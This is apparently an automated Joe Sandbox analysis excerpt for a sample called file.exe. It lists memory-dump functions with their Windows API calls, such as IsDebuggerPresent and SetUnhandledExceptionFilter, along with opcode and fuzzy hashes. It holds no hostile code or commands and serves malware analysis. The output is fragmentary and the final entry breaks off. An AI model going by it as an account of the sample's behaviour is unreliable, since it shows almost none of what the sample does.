                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 701aef890f380427478c142f70fcf8dd48a9ae7cc6a2cfb2897b7bac9242a568
                                                                    • Instruction ID: f855f873936c48a0a8376015fa9fe22405f3e5455c827eebb724938ce03385be
                                                                    • Opcode Fuzzy Hash: 701aef890f380427478c142f70fcf8dd48a9ae7cc6a2cfb2897b7bac9242a568
                                                                    • Instruction Fuzzy Hash: 1B311875D0121C9BDB20DFA4D989BCDBBF8AF08304F1040AAE50CAB251EB759B85CF45
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O^
                                                                    • API String ID: 0-1080724011
                                                                    • Opcode ID: ee5276c8784dd58503b5b51679c9293d2ec6b9acd6d7d9f9e3cd8fa7d5fc7bfe
                                                                    • Instruction ID: ae99d46102fce906a69fe80bb585a303004a900edbf979a52c61ec7ba27795ae
                                                                    • Opcode Fuzzy Hash: ee5276c8784dd58503b5b51679c9293d2ec6b9acd6d7d9f9e3cd8fa7d5fc7bfe
                                                                    • Instruction Fuzzy Hash: 18435A26A956D44FEF124A78C8753DB6FF24B27330F2A279686E41F2D3C54B054AAF10
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000BCEE2
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000BCEEC
                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 000BCEF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 445e1b8c59de2ae9a37b1f3255a4a57c496955116366689f6a993876d657aa95
                                                                    • Instruction ID: 43a7e9883cdd586058732ed7849978db303793a922854d9f8308f0cd8667bc26
                                                                    • Opcode Fuzzy Hash: 445e1b8c59de2ae9a37b1f3255a4a57c496955116366689f6a993876d657aa95
                                                                    • Instruction Fuzzy Hash: 5431D274901229ABDB21DF64D889BDDBBF8BF08310F5041EAE41CA7251EB749B858F44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: bz
                                                                    • API String ID: 0-1364901316
                                                                    • Opcode ID: 5b550c10ca2bf2820e9b46cd58c4bd143073a46a335993dc0cafe56fedfd1206
                                                                    • Instruction ID: 8eff4f195457a28f76b935594b5bb31fd9ccf9c149f1395ed4839fec86efd7cb
                                                                    • Opcode Fuzzy Hash: 5b550c10ca2bf2820e9b46cd58c4bd143073a46a335993dc0cafe56fedfd1206
                                                                    • Instruction Fuzzy Hash: 91F27C66A556D84FEF024AB884B93DF6FF14B2B330F6A2795C5E46F2D3C507010A9B60
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000C6F4D,?,?,00000008,?,?,000C6B1F,00000000), ref: 000C721F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: d636050a1908ed739b109d6b5c7f0f24952fb48b0122c863c6e24888d226200b
                                                                    • Instruction ID: e5f0e81d392170918e42e915b9b678647262fbbef2f397b601b4439c78d01dc4
                                                                    • Opcode Fuzzy Hash: d636050a1908ed739b109d6b5c7f0f24952fb48b0122c863c6e24888d226200b
                                                                    • Instruction Fuzzy Hash: A8B127315146099FD769CF28C48AB697BE1FF45364F29869CE899CF2A1C335E982CF40
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000BA236
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: 325ae4bf7224c8295e4d93f6a8084383a34c5da9ed549585c4c8fdcb3f5cfb3e
                                                                    • Instruction ID: 6e28a841ae48c9486133abdd3d43a3b06bb1af75bcfb8ea93e73e7f91256a156
                                                                    • Opcode Fuzzy Hash: 325ae4bf7224c8295e4d93f6a8084383a34c5da9ed549585c4c8fdcb3f5cfb3e
                                                                    • Instruction Fuzzy Hash: 6D517B71A022099FFB15CF58E8917EEBBF4FB45310F14842AD805EB251E7799A40CF61
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001A580), ref: 000BA45D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: f937bf9bb573901456d2bdd8141132653e02d5d37410d38bc6696054670c9536
                                                                    • Instruction ID: bb9d7d36414dcea6694efde09f61b01d8ae67b8a16211b8e52552fa08c922ccf
                                                                    • Opcode Fuzzy Hash: f937bf9bb573901456d2bdd8141132653e02d5d37410d38bc6696054670c9536
                                                                    • Instruction Fuzzy Hash:
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 3026f1ca653446bdb3cd604ec4abad482c56634d610f4dafd0b16d8dbc67a760
                                                                    • Instruction ID: f20c03d6abdb599239d72a3b2dc8cdf2406a74a7df919277017f1cd2b86f8fd5
                                                                    • Opcode Fuzzy Hash: 3026f1ca653446bdb3cd604ec4abad482c56634d610f4dafd0b16d8dbc67a760
                                                                    • Instruction Fuzzy Hash: 72A001706032419BA7448F36EA0968A3BAAAB4569170580AAA805C5661EB3894549B11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e097fdcbdc5cd7ea3566f174e90c42eb93d6e65e39eda28c91041821ef7e7a2e
                                                                    • Instruction ID: da873a909fb177d21341760ba13f5b3874458aee8e2a7d2876dfef0acadd7020
                                                                    • Opcode Fuzzy Hash: e097fdcbdc5cd7ea3566f174e90c42eb93d6e65e39eda28c91041821ef7e7a2e
                                                                    • Instruction Fuzzy Hash: A922BF76A942845FEF024A78C4A93CF6FE24B6B731F1E275AC9A06F2D2C557010A9B50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61970e7d266d896b18b25a85413c0acb0bea73dc60f73742a9724692a46beaf6
                                                                    • Instruction ID: 0b0e37f49775f864388e6b0f68b59c24bef263c2ce652c7c7f9e9f14859919ce
                                                                    • Opcode Fuzzy Hash: 61970e7d266d896b18b25a85413c0acb0bea73dc60f73742a9724692a46beaf6
                                                                    • Instruction Fuzzy Hash: C812C176E916844FEF018ABCC4A93DF7FE24B6B331F1A2766C5B46B2D2C557040A8B50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6244714f25abe250a449e260ef6d07acf3e66be9bca7e9c5768df901d1316f16
                                                                    • Instruction ID: e4c12dd5cc32dac7f11ce26c6918304100e8abb79407aa5f4f71e6626102c706
                                                                    • Opcode Fuzzy Hash: 6244714f25abe250a449e260ef6d07acf3e66be9bca7e9c5768df901d1316f16
                                                                    • Instruction Fuzzy Hash: C912C673E215145B8B18CEBDCC955DEB7F3AFD9334B2A8329A535EB2D4DA3498018780
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0ca2b5840285e5e116186e813ef153b118c4e41b9b3204cde6e69f4fb8093133
                                                                    • Instruction ID: d2d6aba51a7761f0cac8abb0eec45367ce23e2c71abd8f2061cbcb63b129970d
                                                                    • Opcode Fuzzy Hash: 0ca2b5840285e5e116186e813ef153b118c4e41b9b3204cde6e69f4fb8093133
                                                                    • Instruction Fuzzy Hash: 7E120B72E256188FDB54CEBCCC8169DB7F2AB48330F5A8769E579FB2D4D63099008B50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 60adf7125d72e8220a4c3da2974dc466bfed8f145693a51ec0d39c706f355ee5
                                                                    • Instruction ID: 9bd506a6ae3ad6d41a9f312837d9c08659fe93aaf3304faa6b81c1b3872c5b72
                                                                    • Opcode Fuzzy Hash: 60adf7125d72e8220a4c3da2974dc466bfed8f145693a51ec0d39c706f355ee5
                                                                    • Instruction Fuzzy Hash: 79D0923A645A58AFC310CF49E440D41F7B8FB8D670B254466EE0893B20C335FC11CAE0
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 000BE212
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 000BE320
                                                                    • CatchIt.LIBVCRUNTIME ref: 000BE371
                                                                    • _UnwindNestedFrames.LIBCMT ref: 000BE472
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 000BE48D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 4119006552-393685449
                                                                    • Opcode ID: c1de49c0e2432ddfa430e819a5140a58103f94c62c733c0b038a4801f2697a19
                                                                    • Instruction ID: 556ef9f3be1111243183ee61861e58eaaeb20def416a7eb945f2647241ba6b21
                                                                    • Opcode Fuzzy Hash: c1de49c0e2432ddfa430e819a5140a58103f94c62c733c0b038a4801f2697a19
                                                                    • Instruction Fuzzy Hash: 3DB16675C00259EFCF29DFA4C8859EEBBB9FF18310B14416AE8116B212D734EA51CF92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                    • String ID:
                                                                    • API String ID: 127012223-0
                                                                    • Opcode ID: 24d3fec5f5fa32250b8dd7924673c1b9ebe8eb22bf6c3a0cf323aad1805a1399
                                                                    • Instruction ID: bd8fbcc1bbc17a1fadfa9f9d1a04fd6ebe8b8a76284bcf3133f93e3bc6a02fcd
                                                                    • Opcode Fuzzy Hash: 24d3fec5f5fa32250b8dd7924673c1b9ebe8eb22bf6c3a0cf323aad1805a1399
                                                                    • Instruction Fuzzy Hash: 2D71E67A900E45ABDF209F548C91FEE77EA9F48356F28001DE915A7282E775EDC0C7A0
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 000BB187
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 000BB18F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 000BB218
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 000BB243
                                                                    • _ValidateLocalCookies.LIBCMT ref: 000BB298
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 0af40b514217cf8c54d947b0605912987832f0c50eb53b7aa2b1dc330e9f0ee7
                                                                    • Instruction ID: 21be67020e17d5730af71dcd4e124d9bcbafe7726b460b0677602db79b023d71
                                                                    • Opcode Fuzzy Hash: 0af40b514217cf8c54d947b0605912987832f0c50eb53b7aa2b1dc330e9f0ee7
                                                                    • Instruction Fuzzy Hash: 5741B134A002099FCF10DF68C895AEEBBF4FF05314F148555E919AB392D7B5AA05CB91
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,000BD851,000BAF2D,000BA5C4), ref: 000BD868
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000BD876
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000BD88F
                                                                    • SetLastError.KERNEL32(00000000,000BD851,000BAF2D,000BA5C4), ref: 000BD8E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: ba938594f69323c1ae05f58fa7db69130e2be96787aa8dac200f4b39254aa25d
                                                                    • Instruction ID: 8105a49e10bd8e5bf9eba3fe90fc8217e3dbb08d830a2be52d0f6901d65f6daf
                                                                    • Opcode Fuzzy Hash: ba938594f69323c1ae05f58fa7db69130e2be96787aa8dac200f4b39254aa25d
                                                                    • Instruction Fuzzy Hash: 5301B13621A7115EF6642BB8BC86AEE6B84EB427B6B24023FF414550E2FF158C50A250
                                                                    Strings
                                                                    • C:\Users\user\Desktop\file.exe, xrefs: 000C1B90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\file.exe
                                                                    • API String ID: 0-1957095476
                                                                    • Opcode ID: 270feb717a628b7ff486c7995d595feed8aaad3153d3f62910afbcedee78d1b1
